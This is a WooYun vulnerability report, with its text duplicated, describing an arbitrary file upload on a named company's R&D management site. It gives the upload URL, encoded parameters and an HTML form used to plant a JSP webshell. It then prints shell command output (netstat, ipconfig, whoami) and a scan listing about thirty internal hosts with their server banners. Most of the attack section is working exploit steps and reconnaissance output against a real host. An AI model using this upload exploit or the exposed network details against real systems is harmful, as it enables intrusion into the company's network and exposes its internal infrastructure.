当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0201999

漏洞标题:中兴通重要平台Getshell可直达内网多个系统

相关厂商:中兴通讯股份有限公司

漏洞作者: 艺术家

提交时间:2016-04-27 15:44

修复时间:2016-04-27 17:23

公开时间:2016-04-27 17:23

漏洞类型:文件上传导致任意代码执行

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-27: 细节已通知厂商并且等待厂商处理中
2016-04-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

中兴通创业于1994年,经过21年不懈努力,现已成为具有一定规模的综合性企业集团。截至2015年中,中兴通持有2家新三板上市企业,拥有净资产约40亿元,在北京等地拥有3万平方米物业,员工约六百人。

随着互联网革命的深入,中兴通再度拥抱变革,重踏创业之路。在做优做强财税信息化的基础之上,集团内升外延,战略性的布局互联网+经营,形成了一体(互联网+经营)两翼(股权投资和物业经营),三轮驱动的全新发展格局。

互联网+经营代表着中兴通的战略转型方向,包括中兴通财税、中兴通金融、互联网+诚信体系和网商创业孵化等板块。依托百万家税务企业客户资源,中兴通通过服务升级继续深耕财税信息化领域,并面向中小企业客户推出金融服务,帮助企业成长发展,形成财税与金融的良性互补。在多年从事密码服务的基础之上,中兴通推出旨在推广正品和诚信服务的德码平台,并通过创业孵化培育平台卖家,进而打造本土化电子商务生态圈-德码圈。

中和致远,兴业通达。达则兼济天下。回顾历史,中兴通的每一步发展,都以拥抱时代为主题,都以贡献社会为目标。展望未来,中兴通将坚持初心不改,变中求进,为成为永续经营、奉献社会的百年企业而不懈努力!

详细说明:

漏洞网站:http://yfgl.chinazxt.com
为RDP系统,里面有多个重要内部资料。GETSHELL

dir=cmVwb3NpdG9yeQ%3D%3D&address=LzAwMDAwMDAwMC82OTJkMmUxOS1iNzUwLTRhODktOTEyNC03YjdkMDEwYTViMDM%3D&fileName=Mg%3D%3D&fileExtName=txt


base64后的自定义目录和上传后的文件名,代码生成的文件名是一串uuid
构建语句:

<form id="frmUpload" enctype="multipart/form-data" action="http://yfgl.chinazxt.com/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


得到上传文件

1.jpg


http://yfgl.chinazxt.com/repository/000000000/mytest.jsp
威胁内网安全

E:\Bronzesoft\RDM\Application\rdmapp\power\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 3512
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 720
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING 1612
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING 1612
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1308
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 3512
TCP 0.0.0.0:9099 0.0.0.0:0 LISTENING 1364
TCP 106.37.170.78:80 118.184.26.122:61795 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:61797 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:61992 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62414 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62436 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62438 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62443 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62452 ESTABLISHED 3512
TCP 106.37.170.78:139 0.0.0.0:0 LISTENING 4
TCP 106.37.170.78:2370 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2383 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2388 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2392 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2504 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2507 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2578 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2584 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2618 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:3600 111.206.79.137:80 ESTABLISHED 2276
TCP 106.37.170.78:4621 182.118.59.170:80 ESTABLISHED 2276
TCP 127.0.0.1:3306 127.0.0.1:3961 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:3975 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4042 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4594 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4595 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4596 ESTABLISHED 1308
TCP 127.0.0.1:3961 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:3975 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4042 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4594 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4595 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4596 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 3512
TCP 127.0.0.1:8307 0.0.0.0:0 LISTENING 1760
TCP 127.0.0.1:12001 0.0.0.0:0 LISTENING 1760
TCP 192.168.0.11:139 0.0.0.0:0 LISTENING 4
TCP 192.168.0.11:2186 192.168.0.7:139 ESTABLISHED 4
TCP 192.168.75.1:139 0.0.0.0:0 LISTENING 4
TCP 192.168.230.1:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:1035 *:* 2276
UDP 0.0.0.0:1228 *:* 2168
UDP 0.0.0.0:1238 *:* 2168
UDP 0.0.0.0:1239 *:* 2168
UDP 0.0.0.0:1243 *:* 2168
UDP 0.0.0.0:1244 *:* 2168
UDP 0.0.0.0:3600 *:* 2276
UDP 0.0.0.0:3946 *:* 2168
UDP 0.0.0.0:4727 *:* 2168
UDP 0.0.0.0:4728 *:* 2168
UDP 0.0.0.0:4735 *:* 2168
UDP 0.0.0.0:4736 *:* 2168
UDP 0.0.0.0:4750 *:* 2168
UDP 0.0.0.0:4791 *:* 2168
UDP 0.0.0.0:4792 *:* 2168
UDP 0.0.0.0:4814 *:* 2168
UDP 0.0.0.0:4815 *:* 2168
UDP 0.0.0.0:4836 *:* 2168
UDP 0.0.0.0:4837 *:* 2168
UDP 0.0.0.0:4839 *:* 2168
UDP 0.0.0.0:4840 *:* 2168
UDP 106.37.170.78:123 *:* 860
UDP 106.37.170.78:137 *:* 4
UDP 106.37.170.78:138 *:* 4
UDP 127.0.0.1:123 *:* 860
UDP 127.0.0.1:1329 *:* 2276
UDP 192.168.0.11:123 *:* 860
UDP 192.168.0.11:137 *:* 4
UDP 192.168.0.11:138 *:* 4
UDP 192.168.75.1:123 *:* 860
UDP 192.168.75.1:137 *:* 4
UDP 192.168.75.1:138 *:* 4
UDP 192.168.230.1:123 *:* 860
UDP 192.168.230.1:137 *:* 4
UDP 192.168.230.1:138 *:* 4
E:\Bronzesoft\RDM\Application\rdmapp\power\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : ibm-062501538e1
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter VMware Network Adapter VMnet8:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet8
Physical Address. . . . . . . . . : 00-50-56-C0-00-08
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.230.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter VMware Network Adapter VMnet1:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet1
Physical Address. . . . . . . . . : 00-50-56-C0-00-01
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.75.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter LAN:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2
Physical Address. . . . . . . . . : E4-1F-13-C5-55-F6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.0.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 8.8.8.8
Ethernet adapter WAN:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
Physical Address. . . . . . . . . : E4-1F-13-C5-55-F4
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 106.37.170.78
Subnet Mask . . . . . . . . . . . : 255.255.255.192
Default Gateway . . . . . . . . . : 106.37.170.65
DNS Servers . . . . . . . . . . . : 202.106.0.20


2.jpg


E:\Bronzesoft\RDM\Application\rdmapp\power\> whoami
ibm-062501538e1\admini


威胁内网多个系统:

http://192.168.0.11 >> 中兴通研发管理平台>>Apache-Coyote/1.1 >>Success
http://192.168.0.13 >> >>Apache/2.2.24 (Unix) PHP/5.4.14 >>Success
http://192.168.0.82 >> >>Apache/2.2.15 (Win32) SVN/1.6.5 PHP/5.3.2 DAV/2 >>Success
http://192.168.0.6 >> ����ͨ������ҵ����>>Microsoft-IIS/7.5 >>Success
http://192.168.0.4 >> >>Microsoft-IIS/6.0 >>Success
http://192.168.0.5 >> 数据中心>>Apache >>Success
http://192.168.0.111 >> >>Apache/2.2.15 (Win32) SVN/1.6.5 PHP/5.3.2 DAV/2 >>Success
http://192.168.0.115 >> >>Apache-Coyote/1.1 >>Success
http://192.168.0.116 >> >>Microsoft-IIS/8.0 >>Success
http://192.168.0.118 >> 中兴通集团>>Apache-Coyote/1.1 >>Success
http://192.168.0.102 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://192.168.0.123 >> >>Apache/2.2.15 (Win32) SVN/1.6.5 PHP/5.3.2 DAV/2 >>Success
http://192.168.0.181 >> >>null >>Success
http://192.168.0.189 >> >>Apache/2.2.31 (Unix) PHP/5.4.45 >>Success
http://192.168.0.209 >> >>null >>Success
http://192.168.0.205 >> XenServer 6.2.0>>null >>Success
http://192.168.0.168 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://192.168.0.180 >> Oracle HTTP Server Index>>Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25 >>Success
http://192.168.0.200 >> XCP 1.6.10>>null >>Success
http://192.168.0.185 >> >>Apache/2.4.17 (Unix) PHP/5.6.15 >>Success
http://192.168.0.207 >> XenServer 6.4.95>>null >>Success
http://192.168.0.206 >> XenServer 6.4.95>>null >>Success
http://192.168.0.204 >> XCP 1.6.06>>null >>Success
http://192.168.0.208 >> XenServer 6.4.95>>null >>Success
http://192.168.0.169 >> Oracle HTTP Server Index>>Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25 >>Success
http://192.168.0.222 >> >>Apache >>Success
http://192.168.0.247 >> Index>>Webs >>Success
http://192.168.0.246 >> Index>>Webs >>Success
http://192.168.0.248 >> >>CherryPy/3.1.0beta3 WSGI Server >>Success
http://192.168.0.251 >> 上网认证系统>>iis8.0 >>Success


3.jpg


http://192.168.75.1 >> 中兴通研发管理平台>>Apache-Coyote/1.1 >>Success

漏洞证明:

漏洞网站:http://yfgl.chinazxt.com
为RDP系统,里面有多个重要内部资料。GETSHELL

dir=cmVwb3NpdG9yeQ%3D%3D&address=LzAwMDAwMDAwMC82OTJkMmUxOS1iNzUwLTRhODktOTEyNC03YjdkMDEwYTViMDM%3D&fileName=Mg%3D%3D&fileExtName=txt


base64后的自定义目录和上传后的文件名,代码生成的文件名是一串uuid
构建语句:

<form id="frmUpload" enctype="multipart/form-data" action="http://yfgl.chinazxt.com/upload?dir=cmVwb3NpdG9yeQ==&name=bXl0ZXN0LmpzcA==&start=0&size=7000" method="post">Upload a new file:<br>
<input type="file" name="NewFile" size="50"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>


得到上传文件

1.jpg


http://yfgl.chinazxt.com/repository/000000000/mytest.jsp
威胁内网安全

E:\Bronzesoft\RDM\Application\rdmapp\power\> netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 3512
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 720
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 1760
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:902 0.0.0.0:0 LISTENING 1612
TCP 0.0.0.0:912 0.0.0.0:0 LISTENING 1612
TCP 0.0.0.0:1025 0.0.0.0:0 LISTENING 484
TCP 0.0.0.0:3306 0.0.0.0:0 LISTENING 1308
TCP 0.0.0.0:8009 0.0.0.0:0 LISTENING 3512
TCP 0.0.0.0:9099 0.0.0.0:0 LISTENING 1364
TCP 106.37.170.78:80 118.184.26.122:61795 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:61797 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:61992 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62414 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62436 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62438 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62443 TIME_WAIT 0
TCP 106.37.170.78:80 118.184.26.122:62452 ESTABLISHED 3512
TCP 106.37.170.78:139 0.0.0.0:0 LISTENING 4
TCP 106.37.170.78:2370 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2383 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2388 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2392 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2504 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2507 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2578 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2584 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:2618 123.125.80.76:80 TIME_WAIT 0
TCP 106.37.170.78:3600 111.206.79.137:80 ESTABLISHED 2276
TCP 106.37.170.78:4621 182.118.59.170:80 ESTABLISHED 2276
TCP 127.0.0.1:3306 127.0.0.1:3961 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:3975 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4042 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4594 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4595 ESTABLISHED 1308
TCP 127.0.0.1:3306 127.0.0.1:4596 ESTABLISHED 1308
TCP 127.0.0.1:3961 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:3975 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4042 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4594 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4595 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:4596 127.0.0.1:3306 ESTABLISHED 3512
TCP 127.0.0.1:8005 0.0.0.0:0 LISTENING 3512
TCP 127.0.0.1:8307 0.0.0.0:0 LISTENING 1760
TCP 127.0.0.1:12001 0.0.0.0:0 LISTENING 1760
TCP 192.168.0.11:139 0.0.0.0:0 LISTENING 4
TCP 192.168.0.11:2186 192.168.0.7:139 ESTABLISHED 4
TCP 192.168.75.1:139 0.0.0.0:0 LISTENING 4
TCP 192.168.230.1:139 0.0.0.0:0 LISTENING 4
UDP 0.0.0.0:445 *:* 4
UDP 0.0.0.0:1035 *:* 2276
UDP 0.0.0.0:1228 *:* 2168
UDP 0.0.0.0:1238 *:* 2168
UDP 0.0.0.0:1239 *:* 2168
UDP 0.0.0.0:1243 *:* 2168
UDP 0.0.0.0:1244 *:* 2168
UDP 0.0.0.0:3600 *:* 2276
UDP 0.0.0.0:3946 *:* 2168
UDP 0.0.0.0:4727 *:* 2168
UDP 0.0.0.0:4728 *:* 2168
UDP 0.0.0.0:4735 *:* 2168
UDP 0.0.0.0:4736 *:* 2168
UDP 0.0.0.0:4750 *:* 2168
UDP 0.0.0.0:4791 *:* 2168
UDP 0.0.0.0:4792 *:* 2168
UDP 0.0.0.0:4814 *:* 2168
UDP 0.0.0.0:4815 *:* 2168
UDP 0.0.0.0:4836 *:* 2168
UDP 0.0.0.0:4837 *:* 2168
UDP 0.0.0.0:4839 *:* 2168
UDP 0.0.0.0:4840 *:* 2168
UDP 106.37.170.78:123 *:* 860
UDP 106.37.170.78:137 *:* 4
UDP 106.37.170.78:138 *:* 4
UDP 127.0.0.1:123 *:* 860
UDP 127.0.0.1:1329 *:* 2276
UDP 192.168.0.11:123 *:* 860
UDP 192.168.0.11:137 *:* 4
UDP 192.168.0.11:138 *:* 4
UDP 192.168.75.1:123 *:* 860
UDP 192.168.75.1:137 *:* 4
UDP 192.168.75.1:138 *:* 4
UDP 192.168.230.1:123 *:* 860
UDP 192.168.230.1:137 *:* 4
UDP 192.168.230.1:138 *:* 4
E:\Bronzesoft\RDM\Application\rdmapp\power\> ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : ibm-062501538e1
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter VMware Network Adapter VMnet8:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet8
Physical Address. . . . . . . . . : 00-50-56-C0-00-08
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.230.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter VMware Network Adapter VMnet1:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : VMware Virtual Ethernet Adapter for VMnet1
Physical Address. . . . . . . . . : 00-50-56-C0-00-01
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.75.1
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
Ethernet adapter LAN:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client) #2
Physical Address. . . . . . . . . : E4-1F-13-C5-55-F6
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 192.168.0.11
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
DNS Servers . . . . . . . . . . . : 8.8.8.8
Ethernet adapter WAN:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Broadcom BCM5709C NetXtreme II GigE (NDIS VBD Client)
Physical Address. . . . . . . . . : E4-1F-13-C5-55-F4
DHCP Enabled. . . . . . . . . . . : No
IP Address. . . . . . . . . . . . : 106.37.170.78
Subnet Mask . . . . . . . . . . . : 255.255.255.192
Default Gateway . . . . . . . . . : 106.37.170.65
DNS Servers . . . . . . . . . . . : 202.106.0.20


2.jpg


E:\Bronzesoft\RDM\Application\rdmapp\power\> whoami
ibm-062501538e1\admini


威胁内网多个系统:

http://192.168.0.11 >> 中兴通研发管理平台>>Apache-Coyote/1.1 >>Success
http://192.168.0.13 >> >>Apache/2.2.24 (Unix) PHP/5.4.14 >>Success
http://192.168.0.82 >> >>Apache/2.2.15 (Win32) SVN/1.6.5 PHP/5.3.2 DAV/2 >>Success
http://192.168.0.6 >> ����ͨ������ҵ����>>Microsoft-IIS/7.5 >>Success
http://192.168.0.4 >> >>Microsoft-IIS/6.0 >>Success
http://192.168.0.5 >> 数据中心>>Apache >>Success
http://192.168.0.111 >> >>Apache/2.2.15 (Win32) SVN/1.6.5 PHP/5.3.2 DAV/2 >>Success
http://192.168.0.115 >> >>Apache-Coyote/1.1 >>Success
http://192.168.0.116 >> >>Microsoft-IIS/8.0 >>Success
http://192.168.0.118 >> 中兴通集团>>Apache-Coyote/1.1 >>Success
http://192.168.0.102 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://192.168.0.123 >> >>Apache/2.2.15 (Win32) SVN/1.6.5 PHP/5.3.2 DAV/2 >>Success
http://192.168.0.181 >> >>null >>Success
http://192.168.0.189 >> >>Apache/2.2.31 (Unix) PHP/5.4.45 >>Success
http://192.168.0.209 >> >>null >>Success
http://192.168.0.205 >> XenServer 6.2.0>>null >>Success
http://192.168.0.168 >> IIS7>>Microsoft-IIS/7.5 >>Success
http://192.168.0.180 >> Oracle HTTP Server Index>>Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25 >>Success
http://192.168.0.200 >> XCP 1.6.10>>null >>Success
http://192.168.0.185 >> >>Apache/2.4.17 (Unix) PHP/5.6.15 >>Success
http://192.168.0.207 >> XenServer 6.4.95>>null >>Success
http://192.168.0.206 >> XenServer 6.4.95>>null >>Success
http://192.168.0.204 >> XCP 1.6.06>>null >>Success
http://192.168.0.208 >> XenServer 6.4.95>>null >>Success
http://192.168.0.169 >> Oracle HTTP Server Index>>Oracle HTTP Server Powered by Apache/1.3.22 (Win32) mod_plsql/3.0.9.8.3b mod_ssl/2.8.5 OpenSSL/0.9.6b mod_fastcgi/2.2.12 mod_oprocmgr/1.0 mod_perl/1.25 >>Success
http://192.168.0.222 >> >>Apache >>Success
http://192.168.0.247 >> Index>>Webs >>Success
http://192.168.0.246 >> Index>>Webs >>Success
http://192.168.0.248 >> >>CherryPy/3.1.0beta3 WSGI Server >>Success
http://192.168.0.251 >> 上网认证系统>>iis8.0 >>Success


3.jpg


http://192.168.75.1 >> 中兴通研发管理平台>>Apache-Coyote/1.1 >>Success

修复方案:

版权声明:转载请注明来源 艺术家@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-04-27 17:23

厂商回复:

这个公司和中兴通讯完全没关系啊……

最新状态:

暂无


漏洞评价:

评价